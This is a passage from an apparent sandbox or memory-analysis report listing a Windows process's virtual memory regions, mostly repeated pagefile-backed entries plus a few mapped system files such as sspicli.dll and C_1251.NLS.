0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000003a0000" filename = "" Region: id = 995 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 996 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 997 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 998 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 999 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1000 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1001 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1002 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1003 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1004 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1005 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1006 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1007 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1009 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1010 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1011 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1012 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1013 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1014 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1015 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1016 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1017 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1018 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1019 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1020 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1021 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1022 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1023 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1024 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1025 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1026 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1027 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1028 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1029 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1030 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1031 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1032 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1033 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1034 start_va = 0x3a0000 end_va = 
0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1035 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1102 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1103 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 1104 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1105 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1106 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1107 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1108 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1109 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1110 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1111 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1112 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1113 start_va = 
0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1114 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1115 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1116 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1117 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1118 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1119 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1120 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1121 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1122 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1123 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1124 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1125 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 
1126 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1127 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1128 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1129 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1130 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1131 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1132 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1133 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1134 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1135 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1136 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1137 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1138 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = 
"" Region: id = 1139 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1140 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1141 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1142 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1143 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1144 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1145 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1146 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1147 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1148 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1172 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1173 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1174 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000003a0000" filename = "" Region: id = 1175 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1176 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1177 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1178 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1179 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1180 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1181 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1182 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1183 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1184 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1185 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1186 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1187 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1188 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1189 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1190 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1191 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1192 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1193 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1194 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1195 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1196 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1197 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 1198 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 1199 start_va = 0x3d0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 1200 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1201 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1202 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1215 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1216 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1217 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1218 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1219 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1220 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1221 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1222 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1223 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1224 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1225 start_va = 0x3a0000 end_va = 0x3b1fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1226 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1227 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1228 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1229 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1230 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1231 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1232 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1233 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1234 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1235 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1236 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1237 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1238 start_va = 0x3a0000 
end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1239 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1240 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1241 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1242 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1243 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1244 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1245 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1246 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1247 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1248 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1249 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1250 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1251 
start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1252 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1253 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1254 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1266 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1267 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1268 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1269 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1270 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1271 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1272 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1273 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1274 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" 
Region: id = 1275 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1276 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1277 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1278 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1279 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1280 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1281 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1282 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1283 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1284 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1285 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1286 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1287 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000003a0000" filename = "" Region: id = 1288 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1289 start_va = 0x3a0000 end_va = 0x3b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1290 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4130 start_va = 0x3a0000 end_va = 0x3b0fff entry_point = 0x3a0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 4332 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4333 start_va = 0x17e0000 end_va = 0x1beffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017e0000" filename = "" Region: id = 4334 start_va = 0x1bf0000 end_va = 0x1ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bf0000" filename = "" Region: id = 4335 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 4336 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4337 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4338 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4339 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = pagefile_backed name = 
